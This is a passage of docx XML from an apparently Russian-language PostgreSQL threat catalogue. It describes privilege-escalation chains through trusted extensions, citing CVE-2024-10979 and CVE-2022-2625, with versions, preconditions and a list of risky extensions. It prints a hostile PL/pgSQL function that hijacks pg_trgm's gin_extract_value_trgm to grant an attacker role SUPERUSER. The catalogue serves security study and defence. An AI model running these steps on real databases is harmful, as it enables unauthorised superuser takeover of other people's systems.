          <w:rFonts w:ascii="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>CREATE FUNCTION public.gin_extract_value_trgm(text, internal)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="17270B76" w14:textId="77777777" w:rsidR="0019479F" w:rsidRDefault="00000000">
      <w:pPr>
        <w:shd w:val="clear" w:color="auto" w:fill="F4F4F4"/>
        <w:ind w:left="240"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>RETURNS internal LANGUAGE plpgsql AS $$</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4FEF67A3" w14:textId="77777777" w:rsidR="0019479F" w:rsidRDefault="00000000">
      <w:pPr>
        <w:shd w:val="clear" w:color="auto" w:fill="F4F4F4"/>
        <w:ind w:left="240"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>BEGIN</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2E67B3C7" w14:textId="77777777" w:rsidR="0019479F" w:rsidRDefault="00000000">
      <w:pPr>
        <w:shd w:val="clear" w:color="auto" w:fill="F4F4F4"/>
        <w:ind w:left="240"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve">  EXECUTE 'ALTER ROLE postgres_attacker SUPERUSER';</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5B68B1C8" w14:textId="77777777" w:rsidR="0019479F" w:rsidRDefault="00000000">
      <w:pPr>
        <w:shd w:val="clear" w:color="auto" w:fill="F4F4F4"/>
        <w:ind w:left="240"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve">  RETURN NULL;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5A79335A" w14:textId="77777777" w:rsidR="0019479F" w:rsidRDefault="00000000">
      <w:pPr>
        <w:shd w:val="clear" w:color="auto" w:fill="F4F4F4"/>
        <w:ind w:left="240"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>END;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="76B3DA89" w14:textId="77777777" w:rsidR="0019479F" w:rsidRDefault="00000000">
      <w:pPr>
        <w:shd w:val="clear" w:color="auto" w:fill="F4F4F4"/>
        <w:spacing w:after="100"/>
        <w:ind w:left="240"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>$$;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6CD3A79D" w14:textId="77777777" w:rsidR="0019479F" w:rsidRDefault="00000000">
      <w:pPr>
        <w:spacing w:before="140" w:after="60"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>public</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> schema — до PG 15 PUBLIC имеет CREATE на public, в upgrade-нутых кластерах PG 15+ также (поведение для новых только).</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0ED216F8" w14:textId="77777777" w:rsidR="0019479F" w:rsidRDefault="00000000">
      <w:pPr>
        <w:spacing w:before="140" w:after="60"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>Шаг 2</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> (тот же role с CREATE на БД):</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2CC7CEFC" w14:textId="77777777" w:rsidR="0019479F" w:rsidRDefault="00000000">
      <w:pPr>
        <w:shd w:val="clear" w:color="auto" w:fill="F4F4F4"/>
        <w:spacing w:before="100" w:after="100"/>
        <w:ind w:left="240"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>CREATE EXTENSION pg_trgm;  -- trusted, ставится без superuser</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="085C5771" w14:textId="77777777" w:rsidR="0019479F" w:rsidRDefault="00000000">
      <w:pPr>
        <w:spacing w:before="140" w:after="60"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>До фикса CVE-2022-2625</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> (PG ≤ 14.4 / 13.7 / 12.11 / 11.16 / 10.21):</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="59933EE0" w14:textId="77777777" w:rsidR="0019479F" w:rsidRDefault="00000000">
      <w:pPr>
        <w:shd w:val="clear" w:color="auto" w:fill="F4F4F4"/>
        <w:spacing w:before="100"/>
        <w:ind w:left="240"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>- pg_trgm--N.sql содержит CREATE OR REPLACE FUNCTION public.gin_extract_value_trgm(...)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="00DFF364" w14:textId="77777777" w:rsidR="0019479F" w:rsidRDefault="00000000">
      <w:pPr>
        <w:shd w:val="clear" w:color="auto" w:fill="F4F4F4"/>
        <w:ind w:left="240"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>- Функция уже существует (создана атакующим)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2A88F8E7" w14:textId="77777777" w:rsidR="0019479F" w:rsidRDefault="00000000">
      <w:pPr>
        <w:shd w:val="clear" w:color="auto" w:fill="F4F4F4"/>
        <w:ind w:left="240"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>- БАГ: переписываются атрибуты (owner, security context), но prosrc остаётся атакующее</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="63C18AE3" w14:textId="77777777" w:rsidR="0019479F" w:rsidRDefault="00000000">
      <w:pPr>
        <w:shd w:val="clear" w:color="auto" w:fill="F4F4F4"/>
        <w:spacing w:after="100"/>
        <w:ind w:left="240"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>- Функция теперь принадлежит pg_trgm, owner = tenant_admin (тот, кто сделал CREATE EXTENSION)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="12FA0B0F" w14:textId="77777777" w:rsidR="0019479F" w:rsidRDefault="00000000">
      <w:pPr>
        <w:spacing w:before="140" w:after="60"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">Заметка: в chain 2 owner становится </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>tenant_admin</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> (не superuser, как в чистом 3.13.4). Это </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>не даёт сразу superuser-эскалацию</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> через ownership. Но даёт другой эффект: функция теперь часть extension, и если admin/DBA позже делает </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>CREATE INDEX ... USING gin (... gin_trgm_ops)</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> в </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>другой</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> БД с теми же tenant_admin-правами или под superuser-сессией (для admin-задач), функция исполнится с правами вызывающего.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1D86FF7D" w14:textId="77777777" w:rsidR="0019479F" w:rsidRDefault="00000000">
      <w:pPr>
        <w:spacing w:before="140" w:after="60"/>
      </w:pPr>
      <w:r>
        <w:t>В практике chain 2 — менее прямой, чем chain 1. Реалистичные использования — атака на shared-схему (где extension создаётся в БД, доступной нескольким ролям) или persistence в БД, которая будет backup-нута и restore-нута на другой instance.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5F042B5C" w14:textId="77777777" w:rsidR="0019479F" w:rsidRDefault="00000000">
      <w:pPr>
        <w:spacing w:before="140" w:after="60"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>Полная карточка CVE-2022-2625</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> — в </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>3.13.4</w:t>
      </w:r>
      <w:r>
        <w:t>.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3E00572B" w14:textId="77777777" w:rsidR="0019479F" w:rsidRDefault="00000000">
      <w:pPr>
        <w:pStyle w:val="4"/>
      </w:pPr>
      <w:r>
        <w:t>Список наиболее опасных trusted extensions</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2E1CD1EE" w14:textId="77777777" w:rsidR="0019479F" w:rsidRDefault="00000000">
      <w:pPr>
        <w:spacing w:before="140" w:after="60"/>
      </w:pPr>
      <w:r>
        <w:t>Из contrib PG 14+:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="22AE71FA" w14:textId="77777777" w:rsidR="0019479F" w:rsidRDefault="00000000">
      <w:pPr>
        <w:spacing w:before="40" w:after="40"/>
        <w:ind w:left="200"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">•   </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>plperl</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> — критично из-за CVE-2024-10979 (chain 1). До патча — RCE без superuser.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1957477C" w14:textId="77777777" w:rsidR="0019479F" w:rsidRDefault="00000000">
      <w:pPr>
        <w:spacing w:before="40" w:after="40"/>
        <w:ind w:left="200"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">•   </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>pg_trgm</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> — exploitable через CVE-2022-2625 (chain 2). Function-based indexes с opclass.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="445E1459" w14:textId="77777777" w:rsidR="0019479F" w:rsidRDefault="00000000">
      <w:pPr>
        <w:spacing w:before="40" w:after="40"/>
        <w:ind w:left="200"/>
      </w:pPr>
      <w:r>
        <w:lastRenderedPageBreak/>
        <w:t xml:space="preserve">•   </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>hstore</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> — exploitable через CVE-2022-2625; функции </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>hstore_to_array</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> и др.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="683F6BED" w14:textId="77777777" w:rsidR="0019479F" w:rsidRDefault="00000000">
      <w:pPr>
        <w:spacing w:before="40" w:after="40"/>
        <w:ind w:left="200"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">•   </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>citext</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> — exploitable через CVE-2022-2625; case-insensitive text operators могут быть hijacked.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="641C5BE1" w14:textId="77777777" w:rsidR="0019479F" w:rsidRDefault="00000000">
      <w:pPr>
        <w:spacing w:before="40" w:after="40"/>
        <w:ind w:left="200"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">•   </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>btree_gin / btree_gist</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> — opclass-функции могут стать целью CVE-2022-2625; меньше public exploits, но pattern тот же.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2EFDBF73" w14:textId="77777777" w:rsidR="0019479F" w:rsidRDefault="00000000">
      <w:pPr>
        <w:spacing w:before="40" w:after="40"/>
        <w:ind w:left="200"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">•   </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>plpython3u</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">, </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>plperlu</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">, </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>plsh</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">, </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>plr</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> — </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>не trusted</w:t>
      </w:r>
      <w:r>
        <w:t>, требуют superuser. Не входят в R28-chain.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="57A66A27" w14:textId="77777777" w:rsidR="0019479F" w:rsidRDefault="00000000">
      <w:pPr>
        <w:spacing w:before="140" w:after="60"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>Что произойдёт.</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> Эскалация от tenant-admin или application-роли с CREATE-on-DB к superuser (chain 1) или к контролю extension-функций (chain 2). Финальный финал — векторы 3.7 (COPY PROGRAM, untrusted PL) или horizontal-move (через другие БД на том же кластере).</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="26435008" w14:textId="77777777" w:rsidR="0019479F" w:rsidRDefault="00000000">
      <w:pPr>
        <w:spacing w:before="140" w:after="60"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>Почему это работает.</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> Trusted-флаг в </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>pg_extension.control</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> был добавлен в PG 13 как </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>удобство для multi-tenant SaaS-платформ</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">: позволить customer-ам ставить безопасные extensions без обращения к DBA. Sandbox каждого trusted extension валидировался </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>изолированно</w:t>
      </w:r>
      <w:r>
        <w:t>: plperl trusted считался безопасным, потому что Safe.pm блокирует OS-вызовы; pg_trgm считался безопасным, потому что это просто индексные функции.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7F621207" w14:textId="77777777" w:rsidR="0019479F" w:rsidRDefault="00000000">
      <w:pPr>
        <w:spacing w:before="140" w:after="60"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">Что не было учтено — </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>chain с другими CVE</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">: trusted-флаг расширяет attack surface для </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>уязвимостей, которые могут появиться в этих extensions в будущем</w:t>
      </w:r>
      <w:r>
        <w:t>. CVE-2024-10979 — реализация этого риска: trusted plperl, который считался безопасным с 2010-х годов, оказался эксплуатируемым из non-superuser-роли.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="705A8F8D" w14:textId="77777777" w:rsidR="0019479F" w:rsidRDefault="00000000">
      <w:pPr>
        <w:spacing w:before="140" w:after="60"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">Эта модель угроз — </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>structural</w:t>
      </w:r>
      <w:r>
        <w:t>: каждое новое trusted-extension добавляет в attack surface один потенциальный CVE на ближайшие 10-15 лет жизни extension. PG-сообщество это признаёт (см. R28 open question 8: точный список trusted для PG 14-17 не зафиксирован, что usually индикатор недо-приоритизации управления списком).</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5D41FB8C" w14:textId="77777777" w:rsidR="0019479F" w:rsidRDefault="00000000">
      <w:pPr>
        <w:spacing w:before="140" w:after="60"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>Требования к среде.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="475C1648" w14:textId="77777777" w:rsidR="0019479F" w:rsidRDefault="00000000">
      <w:pPr>
        <w:spacing w:before="40" w:after="40"/>
        <w:ind w:left="200"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">•   </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>Версия PG:</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> ≥ 13.0 (январь 2021) для возможности </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>CREATE EXTENSION</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> non-superuser-ом. До PG 13 все extensions требовали superuser, R28-chain невозможен.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="32CF9BA1" w14:textId="77777777" w:rsidR="0019479F" w:rsidRDefault="00000000">
      <w:pPr>
        <w:spacing w:before="40" w:after="40"/>
        <w:ind w:left="200"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">•   </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>Привилегия атакующего:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6192304D" w14:textId="77777777" w:rsidR="0019479F" w:rsidRDefault="00000000">
      <w:pPr>
        <w:spacing w:before="40" w:after="40"/>
        <w:ind w:left="200"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">•   </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>CREATE</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> на БД (для </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>CREATE EXTENSION</w:t>
      </w:r>
      <w:r>
        <w:t>)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4053D862" w14:textId="77777777" w:rsidR="0019479F" w:rsidRDefault="00000000">
      <w:pPr>
        <w:spacing w:before="40" w:after="40"/>
        <w:ind w:left="200"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">•   Для chain 2: </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>CREATE</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> в схеме, где extension создаёт функции (типично </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>public</w:t>
      </w:r>
      <w:r>
        <w:t>)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6BA0FC58" w14:textId="77777777" w:rsidR="0019479F" w:rsidRDefault="00000000">
      <w:pPr>
        <w:spacing w:before="40" w:after="40"/>
        <w:ind w:left="200"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">•   </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>Superuser не требуется</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="19FDA685" w14:textId="77777777" w:rsidR="0019479F" w:rsidRDefault="00000000">
      <w:pPr>
        <w:spacing w:before="40" w:after="40"/>
        <w:ind w:left="200"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">•   </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>Привилегия жертвы chain 2:</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> admin/DBA, который позже использует «overridden» extension-функцию в другой БД или под другой ролью.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="32E9FB2F" w14:textId="77777777" w:rsidR="0019479F" w:rsidRDefault="00000000">
      <w:pPr>
        <w:spacing w:before="40" w:after="40"/>
        <w:ind w:left="200"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">•   </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>Расширения:</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> список trusted extensions конкретного кластера определяется через </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>SELECT * FROM pg_available_extensions WHERE trusted = true;</w:t>
      </w:r>
      <w:r>
        <w:t>. Перечень меняется между PG-версиями.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5555FCC2" w14:textId="77777777" w:rsidR="0019479F" w:rsidRDefault="00000000">
      <w:pPr>
        <w:spacing w:before="40" w:after="40"/>
        <w:ind w:left="200"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">•   </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>GUC:</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> нет специальных требований.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5ECE91A4" w14:textId="77777777" w:rsidR="0019479F" w:rsidRDefault="00000000">
      <w:pPr>
        <w:spacing w:before="40" w:after="40"/>
        <w:ind w:left="200"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">•   </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>Pre-conditions для chain 1:</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> PG до фикса CVE-2024-10979 (≤ 17.0 / 16.4 / 15.8 / 14.13 / 13.16 / 12.20) + доставка </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>/tmp/x.so</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> (см. 3.7.2b).</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="35B62163" w14:textId="77777777" w:rsidR="0019479F" w:rsidRDefault="00000000">
      <w:pPr>
        <w:spacing w:before="40" w:after="40"/>
        <w:ind w:left="200"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">•   </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>Pre-conditions для chain 2:</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> PG до фикса CVE-2022-2625 (≤ 14.4 / 13.7 / 12.11 / 11.16 / 10.21) + знание signature функции из extension script.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="272BA084" w14:textId="77777777" w:rsidR="0019479F" w:rsidRDefault="00000000">
      <w:pPr>
        <w:spacing w:before="140" w:after="60"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>CVE-блок.</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> R28 не имеет единого CVE — это класс цепочек. Связанные CVE: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3F394C5D"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FB9C1B7" w14:textId="77777777" w:rsidR="0019479F" w:rsidRDefault="00000000">
            <w:r>
              <w:rPr>
                <w:b/>
                <w:bCs/>
                <w:sz w:val="20"/>
                <w:szCs w:val="20"/>
              </w:rPr>
              <w:t>CVE</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4497A8D" w14:textId="77777777" w:rsidR="0019479F" w:rsidRDefault="00000000">
            <w:r>
              <w:rPr>
                <w:b/>
                <w:bCs/>
                <w:sz w:val="20"/>
                <w:szCs w:val="20"/>
              </w:rPr>
              <w:t>Используется в chain</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1EF2A5F" w14:textId="77777777" w:rsidR="0019479F" w:rsidRDefault="00000000">
            <w:r>
              <w:rPr>
                <w:b/>
                <w:bCs/>
                <w:sz w:val="20"/>
                <w:szCs w:val="20"/>
              </w:rPr>
              <w:t>Карточка</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="0019479F" w14:paraId="546B0B22"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335B10" w14:textId="77777777" w:rsidR="0019479F" w:rsidRDefault="00000000">
            <w:r>
              <w:rPr>
                <w:sz w:val="20"/>
                <w:szCs w:val="20"/>
              </w:rPr>
              <w:t>CVE-2024-10979</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392F09" w14:textId="77777777" w:rsidR="0019479F" w:rsidRDefault="00000000">
            <w:r>
              <w:rPr>
                <w:sz w:val="20"/>
                <w:szCs w:val="20"/>
              </w:rPr>
              <w:t>chain 1 (plperl ENV-mutation)</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CE24EA" w14:textId="77777777" w:rsidR="0019479F" w:rsidRDefault="00000000">
            <w:r>
              <w:rPr>
                <w:sz w:val="20"/>
                <w:szCs w:val="20"/>
              </w:rPr>
              <w:t>3.7.2b</w:t>
            </w:r>
          </w:p>
